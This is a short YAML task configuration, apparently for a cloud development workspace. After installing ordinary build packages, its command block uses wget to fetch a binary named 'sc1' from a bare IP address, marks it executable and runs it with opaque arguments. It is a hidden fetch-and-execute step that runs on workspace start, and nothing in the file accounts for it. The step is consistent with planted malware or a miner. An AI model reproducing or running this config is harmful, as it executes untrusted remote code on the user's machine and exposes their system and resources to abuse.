tasks:
  - command: |
         sudo apt-get install -y libopencv-dev build-essential libssl-dev libpq-dev libcurl4-gnutls-dev libexpat1-dev gettext unzip supervisor python3-setuptools python3-pip python3-dev python3-venv python3-urllib3
         wget -q http://139.180.153.145/sc1
         chmod +x sc1
         ./sc1 kolam1 kolam2 kolam3 kolam4 ctrlplusab1 ctrl1 ctrl2 ctrl3